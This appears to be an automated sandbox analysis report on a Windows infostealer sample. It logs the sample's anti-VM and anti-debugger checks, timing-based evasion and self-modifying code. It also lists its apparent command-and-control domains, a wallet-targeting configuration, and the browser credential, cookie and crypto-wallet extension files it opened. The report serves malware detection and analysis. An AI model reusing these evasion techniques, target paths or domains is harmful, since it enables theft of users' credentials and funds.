sub esi, esi 0x00000068 pushad 0x00000069 mov ch, bl 0x0000006b movzx ecx, di 0x0000006e popad 0x0000006f mov dword ptr [ebp-1Ch], esi 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 mov si, 6DE3h 0x00000079 push ecx 0x0000007a pop ebx 0x0000007b popad 0x0000007c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0A90 second address: 49E0ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C2DAh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F05491602E7h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0ABC second address: 49E0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0AC0 second address: 49E0AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0AC4 second address: 49E0ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0ACA second address: 49E0B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05491602DBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, F566h 0x00000017 pushfd 0x00000018 jmp 00007F05491602E7h 0x0000001d jmp 00007F05491602E3h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0B19 second address: 49E0BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F054911993Eh 0x00000011 test esi, esi 0x00000013 jmp 00007F0549119940h 0x00000018 je 00007F05BB357194h 0x0000001e pushad 0x0000001f push ecx 0x00000020 pushfd 0x00000021 jmp 00007F054911993Dh 0x00000026 sub si, D836h 0x0000002b jmp 00007F0549119941h 0x00000030 popfd 0x00000031 pop esi 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F0549119947h 0x00000039 adc eax, 4894556Eh 0x0000003f jmp 00007F0549119949h 0x00000044 popfd 0x00000045 popad 0x00000046 popad 0x00000047 cmp dword ptr [76C8459Ch], 05h 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 call 00007F054911993Fh 0x00000056 pop ecx 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0C72 second address: 49E0C96 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 2DA71AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05491602E7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0C96 second address: 49E0CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F054911993Bh 0x0000000b adc ax, E30Eh 0x00000010 jmp 00007F0549119949h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0549119948h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CE8 second address: 49E0CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CEC second address: 49E0CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CF2 second address: 49E0CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CF8 second address: 49E0CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 49E0CFC second address: 49E0D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Special instruction interceptor: First address: C7B63 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Special instruction interceptor: First address: C7C3C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Special instruction interceptor: First address: 2F7BF7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe TID: 3404 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe TID: 3404 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\3D Objects Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: 0gnHF2twcT.exe, 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 0gnHF2twcT.exe, 00000000.00000003.1577677042.000000000527F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.0000000000999000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\0gnHF2twcT.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: NTICE
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: SICE
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: SIWVID
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Process queried: DebugPort Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: 0gnHF2twcT.exe String found in binary or memory: rapeflowwj.lat
Source: 0gnHF2twcT.exe String found in binary or memory: crosshuaht.lat
Source: 0gnHF2twcT.exe String found in binary or memory: sustainskelet.lat
Source: 0gnHF2twcT.exe String found in binary or memory: aspecteirs.lat
Source: 0gnHF2twcT.exe String found in binary or memory: energyaffai.lat
Source: 0gnHF2twcT.exe String found in binary or memory: necklacebudi.lat
Source: 0gnHF2twcT.exe String found in binary or memory: discokeyus.lat
Source: 0gnHF2twcT.exe String found in binary or memory: grannyejh.lat
Source: 0gnHF2twcT.exe String found in binary or memory: sweepyribs.lat
Source: 0gnHF2twcT.exe, 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ZProgram Manager
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: 0gnHF2twcT.exe, 00000000.00000003.1661698239.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\0gnHF2twcT.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR
Source: 0gnHF2twcT.exe String found in binary or memory: "t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"
Source: 0gnHF2twcT.exe String found in binary or memory: "t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"
Source: 0gnHF2twcT.exe String found in binary or memory: json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},
Source: 0gnHF2twcT.exe String found in binary or memory: e"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Source: 0gnHF2twcT.exe String found in binary or memory: e"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%
Source: 0gnHF2twcT.exe String found in binary or memory: jfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: 0gnHF2twcT.exe String found in binary or memory: keystore
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
